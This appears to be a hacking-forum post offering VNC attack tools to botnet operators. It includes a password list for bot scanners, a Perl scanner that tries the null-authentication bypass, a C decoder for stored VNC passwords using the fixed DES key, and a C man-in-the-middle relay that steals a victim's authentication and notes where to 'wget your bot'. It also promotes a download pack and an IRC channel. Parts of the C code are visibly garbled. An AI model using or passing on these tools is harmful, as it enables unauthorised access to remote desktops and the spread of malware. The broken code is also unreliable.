# OK well, ill get right into it.
# The easiest bypass for VNC is the AUTH challenge code, ok, ow open up some winvnc code (remember, most vncs are
# actually based on this, or even a tightvnc code…) , anyhow, in many versions, you will find there is a part
# somewhere like this:
#define AUTH_CHALLENGE %s%s%s%s%s%s%s%s
#define CHALLENGE %s%s%s%s%s%s%s%s
#or:
#define AUTH_PWD %s%s%s%s%s%s%s%s
Depends on the code so.. ok, we have the most simplest of Buffer overflows, no boundary checks, because, well, look at it :s, then in the code, it ONLY checks the auth, on those 8 digits… ok so for example, if you want to break VNC, you must know one thing… passwords can be longer,or shorter, but, you cannot bruteforce VNC with 100 passwd lists:P
you would be lucky to get 3 goes, so guess what your BEST password would be ??
123456789
simply add this into your scanner for rBot etc…and then, maybe more…because the next b0f, i cannot disclose as it is activelyye explitable still on ALL OS, as the 8digit one, should be still..on Many…and, i do test NEW corp releases etc, against the auth bypass wich does a decrypt on the host, thats NOT disclosed,and people have called me crazy for even trying but, i have the code wich says, thats bs…and, i showed some of this to the botting community….anyhow… the problem with most bruters is simply, they dont have an easy passlist…and believe me, the best is this list here:
123456789
1234
123
vnc
master
letmein
-> nomore than 6 passes,but these will always be good enough believe it…
OK so, third section is simply, give you guys a few older codes…and, maybe, if your lucky enough, you will sometimes get chances to use them, using MY viewer,wich , does NULL auth bypass no problem, BUT, null is shitty, you want to decrypt 
and, sorry but tht code, is still pvt after 5yrs now…
Anyhow…moving on…
Some codes:
Perl scanner wich is VERY good,but, you might want some listings,to better attack versions… :
#!/usr/bin/perl
use strict;
my $target = shift;
die "Usage: $0 <ip/host>\n" unless $target;
my $scanner = VNCScanner->new;
$scanner->scan($target);
package VNCScanner;
use IO::Socket::INET;
sub new {
my ($class) = @_;
my $self = {};
return bless $self, $class;
}
*socket = \&sock;
sub sock { $_[0]->{sock} }
sub scan {
my ($self, $host) = @_;
my $socket = IO::Socket::INET->new(
PeerAddr => $host,
PeerPort => '5900',
Proto => 'tcp',
) or warn "Error connecting to $host: $!\n";
if ($socket && $socket->connected) {
$self->{sock} = $socket;
$self->connect;
}
}
sub connect {
my $self = shift;
my $socket = $self->sock;
# read protocol version
my $proto_v;
$socket->read($proto_v, 12);
$proto_v ||= '';
chomp $proto_v;
my ($maj_v, $min_v) = $proto_v =~ /RFB (\d+)\.(\d+)/;
$self->{maj_v} = $maj_v;
$self->{min_v} = $min_v;
$self->log("Found RFB server ($maj_v.$min_v)");
if ($maj_v == 3) {
$self->auth;
} elsif ($maj_v) {
$self->log("Unknown RFB version $maj_v");
} else {
$self->log("Unknown RFB version response: $proto_v");
}
}
sub auth {
my $self = shift;
my $sock = $self->sock;
if ($self->{min_v} >= 7) {
# do v. 7 auth
$sock->print("RFB 003.007\n"); ## this is type most UNiX use 
~~ -xd
# should receive 1 byte count of auth types
my $sec_t_cnt;
$sock->read($sec_t_cnt, 1);
if ($sec_t_cnt) {
# read array of auth types
my $sec_t_array;
$sock->read($sec_t_array, int($sec_t_cnt));
# try auth bypass
$sock->print(pack('C', 0x01)); # auth type none NULL BYPASS here... but this is basic and crude -xd
$self->check_auth_resp;
} else {
my $err_str_len;
$sock->read($err_str_len, 4);
$err_str_len = unpack('N', $err_str_len) + 0;
my $err_str;
$sock->read($err_str, $err_str_len);
$self->log("Got auth error: $err_str");
}
} else {
# request version 3.3 auth
$sock->print("RFB 003.003\n");
# should get a type back
my $sec_t;
$sock->read($sec_t, 4);
$sec_t = unpack('N', $sec_t);
unless ($sec_t) {
$self->log("Auth rejected");
return;
}
if ($sec_t == 1) {
# no auth, yay
$self->log("No auth required!");
} else {
$self->log("Auth type $sec_t requested. Giving up.");
}
}
}
sub check_auth_resp {
my $self = shift;
my $sock = $self->sock;
# read securityresult
my $sec_res;
$sock->read($sec_res, 4);
$sec_res = unpack('N', $sec_res);
if ($sec_res == 0) {
# we're in!
$self->log("Connected successfully!");
} else {
# read reason
my $err_str_len;
$sock->read($err_str_len, 4);
$err_str_len = unpack('N*', $err_str_len) + 0;
my $err_str;
$sock->read($err_str, $err_str_len);
$self->log("Error in authentication: $err_str");
# server will disconnect
$sock->close;
}
}
sub log {
my ($self, ,$msg) = @_;
my $sock = $self->sock;
my $addr = $sock ? $sock->peerhost : '';
print "[$addr] $msg\n";
}
And now the best thing i think you might wanna play with…. is decrypting the better vncs
Some .c code here i moved into the download pack also, so you can like, fix it
/* VNC password decoder */
/* tested on Linux */
/* I take no credit */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>
#define MAXPWLEN 8 //---> haha w00ps we forgot to make auth only on the first 8 digits!
#define CHALLENGESIZE 16
#define EN0 0 /* MODE == encrypt */
#define DE1 1 /* MODE == decrypt */
extern int vncEncryptPasswd(char *passwd, char *fname);
extern char *vncDecryptPasswd(char *fname);
extern void vncRandomBytes(unsigned char *bytes);
extern void vncEncryptBytes(unsigned char *bytes, const char *passwd);
extern void deskey(unsigned char *, int);
extern void usekey(unsigned long *);
extern void cpkey(unsigned long *);
extern void des(unsigned char *, unsigned char *); // yea,ya want the d3des/rfb.h..or ya will never get this..
unsigned char fixedkey[8] = {23,82,107,6,35,78,88,7}; // and the char [8] fixed-key for all auths 
// proof that the bug exists 100% -xd
void main (void) {
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80}; // change this..if you want to, if you know wtf ur doin -xd
printf("%8s\n",vncDecryptPasswd(p));
}
char *vncDecryptPasswd(char *inouttext) {
unsigned char *passwd = (unsigned char *)malloc(9);
deskey(fixedkey, DE1);
des(inouttext, passwd);
passwd[8] = 0; //ohno...well look here...it only checks 8 password length afterall - passwd[8] = 0; -xd
return (char *)passwd;
}
static void scrunch(unsigned char *, unsigned long *);
static void unscrun(unsigned long *, unsigned char *);
static void desfunc(unsigned long *, unsigned long *);
static void cookey(unsigned long *);
static unsigned long KnL[32] = { 0L };
static unsigned long KnR[32] = { 0L };
static unsigned long Kn3[32] = { 0L };
static unsigned char Df_Key[24] = {
0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10,
0x89,0xab,0xcd,0xef,0x01,0x23,0x45,0x67 };
static unsigned short bytebit[8] = { 01, 02, 04, 010, 020, 040, 0100, 0200 };
static unsigned long bigbyte[24] = {
0x800000L, 0x400000L, 0x200000L, 0x100000L,
0x80000L, 0x40000L, 0x20000L, 0x10000L,
0x8000L, 0x4000L, 0x2000L, 0x1000L,
0x800L, 0x400L, 0x200L, 0x100L,
0x80L, 0x40L, 0x20L, 0x10L,
0x8L, 0x4L, 0x2L, 0x1L };
/* Use the key schedule specified in the Standard (ANSI X3.92-1981). */
static unsigned char pc1[56] = {
56, 48, 40, 32, 24, 16, 8, 0, 57, 49, 41, 33, 25, 17,
9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35,
62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21,
13, 5, 60, 52, 44, 36, 28, 20, 12, 4, 27, 19, 11, 3 };
static unsigned char totrot[16] = {
1,2,4,6,8,10,12,14,15,17,19,21,23,25,27,28 };
static unsigned char pc2[48] = {
13, 16, 10, 23, 0, 4, 2, 27, 14, 5, 20, 9,
22, 18, 11, 3, 25, 7, 15, 6, 26, 19, 12, 1,
40, 51, 30, 36, 46, 54, 29, 39, 50, 44, 32, 47,
43, 48, 38, 55, 33, 52, 45, 41, 49, 35, 28, 31 };
void deskey(key, edf)
unsigned char *key;
int edf;
{
register int i, j, l, m, n;
unsigned char pc1m[56], pcr[56];
unsigned long kn[32];
for ( j = 0; j < 56; j++ ) {
l = pc1[j];
m = l & 07;
pc1m[j] = (key[l >> 3] & bytebit[m]) ? 1 : 0;
}
for( i = 0; i < 16; i++ ) {
if( edf == DE1 ) m = (15 - i) << 1;
else m = i << 1;
n = m + 1;
kn[m] = kn[n] = 0L;
for( j = 0; j < 28; j++ ) {
l = j + totrot[i];
if( l < 28 ) pcr[j] = pc1m[l];
else pcr[j] = pc1m[l - 28];
}
for( j = 28; j < 56; j++ ) {
l = j + totrot[i];
if( l < 56 ) pcr[j] = pc1m[l];
else pcr[j] = pc1m[l - 28];
}
for( j = 0; j < 24; j++ ) {
if( pcr[pc2[j]] ) kn[m] |= bigbyte[j];
if( pcr[pc2[j+24]] ) kn[n] |= bigbyte[j];
}
}
cookey(kn);
return;
}
static void cookey(raw1)
register unsigned long *raw1;
{
register unsigned long *cook, *raw0;
unsigned long dough[32];
register int i;
cook = dough;
for( i = 0; i < 16; i++, raw1++ ) {
raw0 = raw1++;
*cook = (*raw0 & 0x00fc0000L) << 6;
*cook |= (*raw0 & 0x00000fc0L) << 10;
*cook |= (*raw1 & 0x00fc0000L) >> 10;
*cook++ |= (*raw1 & 0x00000fc0L) >> 6;
*cook = (*raw0 & 0x0003f000L) << 12;
*cook |= (*raw0 & 0x0000003fL) << 16;
*cook |= (*raw1 & 0x0003f000L) >> 4;
*cook++ |= (*raw1 & 0x0000003fL);
}
usekey(dough);
return;
}
void cpkey(into)
register unsigned long *into;
{
register unsigned long *from, *endp;
from = KnL, endp = &KnL[32];
while( from < endp ) *into++ = *from++;
return;
}
void usekey(from)
register unsigned long *from;
{
register unsigned long *to, *endp;
to = KnL, endp = &KnL[32];
while( to < endp ) *to++ = *from++;
return;
}
void des(inblock, outblock)
unsigned char *inblock, *outblock;
{
unsigned long work[2];
scrunch(inblock, work);
desfunc(work, KnL);
unscrun(work, outblock);
return;
}
static void scrunch(outof, into)
register unsigned char *outof;
register unsigned long *into;
{
*into = (*outof++ & 0xffL) << 24;
*into |= (*outof++ & 0xffL) << 16;
*into |= (*outof++ & 0xffL) << 8;
*into++ |= (*outof++ & 0xffL);
*into = (*outof++ & 0xffL) << 24;
*into |= (*outof++ & 0xffL) << 16;
*into |= (*outof++ & 0xffL) << 8;
*into |= (*outof & 0xffL);
return;
}
static void unscrun(outof, into)
register unsigned long *outof;
register unsigned char *into;
{
*into++ = (*outof >> 24) & 0xffL;
*into++ = (*outof >> 16) & 0xffL;
*into++ = (*outof >> 
& 0xffL;
*into++ = *outof++ & 0xffL;
*into++ = (*outof >> 24) & 0xffL;
*into++ = (*outof >> 16) & 0xffL;
*into++ = (*outof >> & 0xffL;
*into = *outof & 0xffL;
return;
}
static unsigned long SP1[64] = {
0x01010400L, 0x00000000L, 0x00010000L, 0x01010404L,
0x01010004L, 0x00010404L, 0x00000004L, 0x00010000L,
0x00000400L, 0x01010400L, 0x01010404L, 0x00000400L,
0x01000404L, 0x01010004L, 0x01000000L, 0x00000004L,
0x00000404L, 0x01000400L, 0x01000400L, 0x00010400L,
0x00010400L, 0x01010000L, 0x01010000L, 0x01000404L,
0x00010004L, 0x01000004L, 0x01000004L, 0x00010004L,
0x00000000L, 0x00000404L, 0x00010404L, 0x01000000L,
0x00010000L, 0x01010404L, 0x00000004L, 0x01010000L,
0x01010400L, 0x01000000L, 0x01000000L, 0x00000400L,
0x01010004L, 0x00010000L, 0x00010400L, 0x01000004L,
0x00000400L, 0x00000004L, 0x01000404L, 0x00010404L,
0x01010404L, 0x00010004L, 0x01010000L, 0x01000404L,
0x01000004L, 0x00000404L, 0x00010404L, 0x01010400L,
0x00000404L, 0x01000400L, 0x01000400L, 0x00000000L,
0x00010004L, 0x00010400L, 0x00000000L, 0x01010004L };
static unsigned long SP2[64] = {
0x80108020L, 0x80008000L, 0x00008000L, 0x00108020L,
0x00100000L, 0x00000020L, 0x80100020L, 0x80008020L,
0x80000020L, 0x80108020L, 0x80108000L, 0x80000000L,
0x80008000L, 0x00100000L, 0x00000020L, 0x80100020L,
0x00108000L, 0x00100020L, 0x80008020L, 0x00000000L,
0x80000000L, 0x00008000L, 0x00108020L, 0x80100000L,
0x00100020L, 0x80000020L, 0x00000000L, 0x00108000L,
0x00008020L, 0x80108000L, 0x80100000L, 0x00008020L,
0x00000000L, 0x00108020L, 0x80100020L, 0x00100000L,
0x80008020L, 0x80100000L, 0x80108000L, 0x00008000L,
0x80100000L, 0x80008000L, 0x00000020L, 0x80108020L,
0x00108020L, 0x00000020L, 0x00008000L, 0x80000000L,
0x00008020L, 0x80108000L, 0x00100000L, 0x80000020L,
0x00100020L, 0x80008020L, 0x80000020L, 0x00100020L,
0x00108000L, 0x00000000L, 0x80008000L, 0x00008020L,
0x80000000L, 0x80100020L, 0x80108020L, 0x00108000L };
static unsigned long SP3[64] = {
0x00000208L, 0x08020200L, 0x00000000L, 0x08020008L,
0x08000200L, 0x00000000L, 0x00020208L, 0x08000200L,
0x00020008L, 0x08000008L, 0x08000008L, 0x00020000L,
0x08020208L, 0x00020008L, 0x08020000L, 0x00000208L,
0x08000000L, 0x00000008L, 0x08020200L, 0x00000200L,
0x00020200L, 0x08020000L, 0x08020008L, 0x00020208L,
0x08000208L, 0x00020200L, 0x00020000L, 0x08000208L,
0x00000008L, 0x08020208L, 0x00000200L, 0x08000000L,
0x08020200L, 0x08000000L, 0x00020008L, 0x00000208L,
0x00020000L, 0x08020200L, 0x08000200L, 0x00000000L,
0x00000200L, 0x00020008L, 0x08020208L, 0x08000200L,
0x08000008L, 0x00000200L, 0x00000000L, 0x08020008L,
0x08000208L, 0x00020000L, 0x08000000L, 0x08020208L,
0x00000008L, 0x00020208L, 0x00020200L, 0x08000008L,
0x08020000L, 0x08000208L, 0x00000208L, 0x08020000L,
0x00020208L, 0x00000008L, 0x08020008L, 0x00020200L };
static unsigned long SP4[64] = {
0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
0x00802080L, 0x00800081L, 0x00800001L, 0x00002001L,
0x00000000L, 0x00802000L, 0x00802000L, 0x00802081L,
0x00000081L, 0x00000000L, 0x00800080L, 0x00800001L,
0x00000001L, 0x00002000L, 0x00800000L, 0x00802001L,
0x00000080L, 0x00800000L, 0x00002001L, 0x00002080L,
0x00800081L, 0x00000001L, 0x00002080L, 0x00800080L,
0x00002000L, 0x00802080L, 0x00802081L, 0x00000081L,
0x00800080L, 0x00800001L, 0x00802000L, 0x00802081L,
0x00000081L, 0x00000000L, 0x00000000L, 0x00802000L,
0x00002080L, 0x00800080L, 0x00800081L, 0x00000001L,
0x00802001L, 0x00002081L, 0x00002081L, 0x00000080L,
0x00802081L, 0x00000081L, 0x00000001L, 0x00002000L,
0x00800001L, 0x00002001L, 0x00802080L, 0x00800081L,
0x00002001L, 0x00002080L, 0x00800000L, 0x00802001L,
0x00000080L, 0x00800000L, 0x00002000L, 0x00802080L };
static unsigned long SP5[64] = {
0x00000100L, 0x02080100L, 0x02080000L, 0x42000100L,
0x00080000L, 0x00000100L, 0x40000000L, 0x02080000L,
0x40080100L, 0x00080000L, 0x02000100L, 0x40080100L,
0x42000100L, 0x42080000L, 0x00080100L, 0x40000000L,
0x02000000L, 0x40080000L, 0x40080000L, 0x00000000L,
0x40000100L, 0x42080100L, 0x42080100L, 0x02000100L,
0x42080000L, 0x40000100L, 0x00000000L, 0x42000000L,
0x02080100L, 0x02000000L, 0x42000000L, 0x00080100L,
0x00080000L, 0x42000100L, 0x00000100L, 0x02000000L,
0x40000000L, 0x02080000L, 0x42000100L, 0x40080100L,
0x02000100L, 0x40000000L, 0x42080000L, 0x02080100L,
0x40080100L, 0x00000100L, 0x02000000L, 0x42080000L,
0x42080100L, 0x00080100L, 0x42000000L, 0x42080100L,
0x02080000L, 0x00000000L, 0x40080000L, 0x42000000L,
0x00080100L, 0x02000100L, 0x40000100L, 0x00080000L,
0x00000000L, 0x40080000L, 0x02080100L, 0x40000100L };
static unsigned long SP6[64] = {
0x20000010L, 0x20400000L, 0x00004000L, 0x20404010L,
0x20400000L, 0x00000010L, 0x20404010L, 0x00400000L,
0x20004000L, 0x00404010L, 0x00400000L, 0x20000010L,
0x00400010L, 0x20004000L, 0x20000000L, 0x00004010L,
0x00000000L, 0x00400010L, 0x20004010L, 0x00004000L,
0x00404000L, 0x20004010L, 0x00000010L, 0x20400010L,
0x20400010L, 0x00000000L, 0x00404010L, 0x20404000L,
0x00004010L, 0x00404000L, 0x20404000L, 0x20000000L,
0x20004000L, 0x00000010L, 0x20400010L, 0x00404000L,
0x20404010L, 0x00400000L, 0x00004010L, 0x20000010L,
0x00400000L, 0x20004000L, 0x20000000L, 0x00004010L,
0x20000010L, 0x20404010L, 0x00404000L, 0x20400000L,
0x00404010L, 0x20404000L, 0x00000000L, 0x20400010L,
0x00000010L, 0x00004000L, 0x20400000L, 0x00404010L,
0x00004000L, 0x00400010L, 0x20004010L, 0x00000000L,
0x20404000L, 0x20000000L, 0x00400010L, 0x20004010L };
static unsigned long SP7[64] = {
0x00200000L, 0x04200002L, 0x04000802L, 0x00000000L,
0x00000800L, 0x04000802L, 0x00200802L, 0x04200800L,
0x04200802L, 0x00200000L, 0x00000000L, 0x04000002L,
0x00000002L, 0x04000000L, 0x04200002L, 0x00000802L,
0x04000800L, 0x00200802L, 0x00200002L, 0x04000800L,
0x04000002L, 0x04200000L, 0x04200800L, 0x00200002L,
0x04200000L, 0x00000800L, 0x00000802L, 0x04200802L,
0x00200800L, 0x00000002L, 0x04000000L, 0x00200800L,
0x04000000L, 0x00200800L, 0x00200000L, 0x04000802L,
0x04000802L, 0x04200002L, 0x04200002L, 0x00000002L,
0x00200002L, 0x04000000L, 0x04000800L, 0x00200000L,
0x04200800L, 0x00000802L, 0x00200802L, 0x04200800L,
0x00000802L, 0x04000002L, 0x04200802L, 0x04200000L,
0x00200800L, 0x00000000L, 0x00000002L, 0x04200802L,
0x00000000L, 0x00200802L, 0x04200000L, 0x00000800L,
0x04000002L, 0x04000800L, 0x00000800L, 0x00200002L };
static unsigned long SP8[64] = {
0x10001040L, 0x00001000L, 0x00040000L, 0x10041040L,
0x10000000L, 0x10001040L, 0x00000040L, 0x10000000L,
0x00040040L, 0x10040000L, 0x10041040L, 0x00041000L,
0x10041000L, 0x00041040L, 0x00001000L, 0x00000040L,
0x10040000L, 0x10000040L, 0x10001000L, 0x00001040L,
0x00041000L, 0x00040040L, 0x10040040L, 0x10041000L,
0x00001040L, 0x00000000L, 0x00000000L, 0x10040040L,
0x10000040L, 0x10001000L, 0x00041040L, 0x00040000L,
0x00041040L, 0x00040000L, 0x10041000L, 0x00001000L,
0x00000040L, 0x10040040L, 0x00001000L, 0x00041040L,
0x10001000L, 0x00000040L, 0x10000040L, 0x10040000L,
0x10040040L, 0x10000000L, 0x00040000L, 0x10001040L,
0x00000000L, 0x10041040L, 0x00040040L, 0x10000040L,
0x10040000L, 0x10001000L, 0x10001040L, 0x00000000L,
0x10041040L, 0x00041000L, 0x00041000L, 0x00001040L,
0x00001040L, 0x00040040L, 0x10000000L, 0x10041000L };
static void desfunc(block, keys)
register unsigned long *block, *keys;
{
register unsigned long fval, work, right, leftt;
register int round;
leftt = block[0];
right = block[1];
work = ((leftt >> 4) ^ right) & 0x0f0f0f0fL;
right ^= work;
leftt ^= (work << 4);
work = ((leftt >> 16) ^ right) & 0x0000ffffL;
right ^= work;
leftt ^= (work << 16);
work = ((right >> 2) ^ leftt) & 0x33333333L;
leftt ^= work;
right ^= (work << 2);
work = ((right >> ^ leftt) & 0x00ff00ffL;
leftt ^= work;
right ^= (work << 8);
right = ((right << 1) | ((right >> 31) & 1L)) & 0xffffffffL;
work = (leftt ^ right) & 0xaaaaaaaaL;
leftt ^= work;
right ^= work;
leftt = ((leftt << 1) | ((leftt>>31) & 1L)) & 0xffffffffL;
for( round = 0; round < 8; round++ ) {
work = (right<<28) | (right>>4);
work ^= *keys++;
fval = SP7[ work & 0x3fL];
fval |= SP5[(work>>8) & 0x3fL];
fval |= SP3[(work>>16) & 0x3fL];
fval |= SP1[(work>>24) & 0x3fL];
work = right ^ *keys++;
fval |= SP8[ work & 0x3fL];
fval |= SP6[(work>>8) & 0x3fL];
fval |= SP4[(work>>16) & 0x3fL];
fval |= SP2[(work>>24) & 0x3fL];
leftt ^= fval;
work = (leftt << 28) | (leftt>>4);
work ^= *keys++;
fval = SP7[ work & 0x3fL];
fval |= SP5[(work >> & 0x3fL];
fval |= SP3[(work >> 16) & 0x3fL];
fval |= SP1[(work >> 24) & 0x3fL];
work = leftt ^ *keys++;
fval |= SP8[ work & 0x3fL];
fval |= SP6[(work >> & 0x3fL];
fval |= SP4[(work >> 16) & 0x3fL];
fval |= SP2[(work >> 24) & 0x3fL];
right ^= fval;
}
right = (right << 31) | (right >> 1);
work = (leftt ^ right) & 0xaaaaaaaaL;
leftt ^= work;
right ^= work;
leftt = (leftt << 31) | (leftt >> 1);
work = ((leftt >> ^ right) & 0x00ff00ffL;
right ^= work;
leftt ^= (work << 8);
work = ((leftt >> 2) ^ right) & 0x33333333L;
right ^= work;
leftt ^= (work << 2);
work = ((right >> 16) ^ leftt) & 0x0000ffffL;
leftt ^= work;
right ^= (work << 16);
work = ((right >> 4) ^ leftt) & 0x0f0f0f0fL;
leftt ^= work;
right ^= (work << 4);
*block++ = right;
*block = leftt;
return;
}
[/code]
hehe thats basically, how a standard decryptor works, so, spot that 8digit bug yet ?? lol..... blieve me, use it!
now... one more code,and thats IT! THIS is a different method.. VNC MiTM attack! yea bitches... watchout!
1
#include <netinet/in.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#define VNCPORT 5900
#define VNCSERVER "x.x.x.x" // enter ya fakey here this only is for, making it exec,
// look at bottom where it shows how todo this..
#define QUEUE 8
#define BUFSIZ 512
typedef char rfbProtocolVersionMsg[13];
#define sz_rfbProtocolVersionMsg 12
int main (int argc, char **argv) {
int sockfd, clientfd, vncfd;
int nbytes = 0;
struct sockaddr_in server, client, vnc;
int len = sizeof (client);
char buf [BUFSIZ];
if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
perror ("socket");
exit (-1);
}
bzero (&server, sizeof (server));
server.sin_family = AF_INET;
server.sin_addr.s_addr = htonl (INADDR_ANY);
server.sin_port = htons (VNCPORT);
/* this is the fake VNC server */
if (bind (sockfd, (struct sockaddr *) &server, sizeof (server)) == -1) {
perror ("bind");
exit (-1);
}
listen (sockfd, QUEUE);
if ((clientfd = accept (sockfd,(struct sockaddr *) &client, &len)) == -1) {
perror ("accept");
exit (-1);
}
strcpy (buf, "RFB 003.003\n");
/* we must send VNC version number (from proto) */
if (write (clientfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we also must read VNC version number (from protocol) */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
buf [nbytes] = 0;
printf ("[VNC Version] -> %s\n", buf);
buf [0] = 0x00;
buf [1] = 0x00;
buf [2] = 0x00;
buf [3] = 0x02;
/* we send the authentication method code to the client */
if (write (clientfd, buf, 4) < 4) {
perror ("write");
exit (-1);
}
if ((vncfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) {
perror ("socket");
exit (-1);
}
bzero (&vnc, sizeof (vnc));
vnc.sin_family = AF_INET;
vnc.sin_addr.s_addr = inet_addr (VNCSERVER);
vnc.sin_port = htons (VNCPORT);
/* we connect to the real VNC server */
if (connect (vncfd, (struct sockaddr *) &vnc, sizeof (vnc) ) == -1) {
perror ("connect");
exit (-1);
}
/* again, we read version number from the VNC server */
if ((nbytes = read (vncfd, buf, BUFSIZ)) <= 0) {
perror ("read");
exit (-1);
}
strcpy (buf, "RFB 003.003\n");
/* and we send ours */
if (write (vncfd, buf, strlen (buf) ) < strlen (buf) ) {
perror ("write");
exit (-1);
}
/* we now read auth method code from VNC server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* here is the challenge from server */
if ( (nbytes = read (vncfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the challenge to the victim client */
if (write (clientfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we have the encrypted pass from the client */
if ( (nbytes = read (clientfd, buf, BUFSIZ) ) <= 0) {
perror ("read");
exit (-1);
}
/* we send the encrypted pass to the VNC server */
if (write (vncfd, buf, 16) < 16) {
perror ("write");
exit (-1);
}
/* we read the result from the auth process */
if (read (vncfd, buf, BUFSIZ) < 4) {
perror ("read");
exit (-1);
}
/* at this point we should be authd */
/* place whatever code you want here ex: ftp cmd to wget your bot... */
close (clientfd);
close (sockfd);
close (vncfd);
return 0;
}
Nice one eh ... hehe, now imagine, making ppl logon, and show them a fake looking vnc but infact it is MiTM i have kept this one hidden until, i guess i got sick of being alone
Now..what else is handy for vnc ?
Try grab this, it might be more useful, but remember about the best exploit wich, has no cve...yet i just posted it the no.1 8digit bypass,is the best!
this pack, is only tools... not all mine, and, not MY viewer, but, i could add the viewer if i am requested personally, only on my irc channel #haxnet - EFnet!
xd!
-> http://hotfile.com/dl/136984708/855b1ef/VNC.Cracking-ALL.rar.html
ALSO look for VNCsnapshot,and also, the author of it or, a member of the team maybe, who actually made a MOD of it wich works exactly with MY bots listing so it is c00kl
Anyhow, this is , enough for now...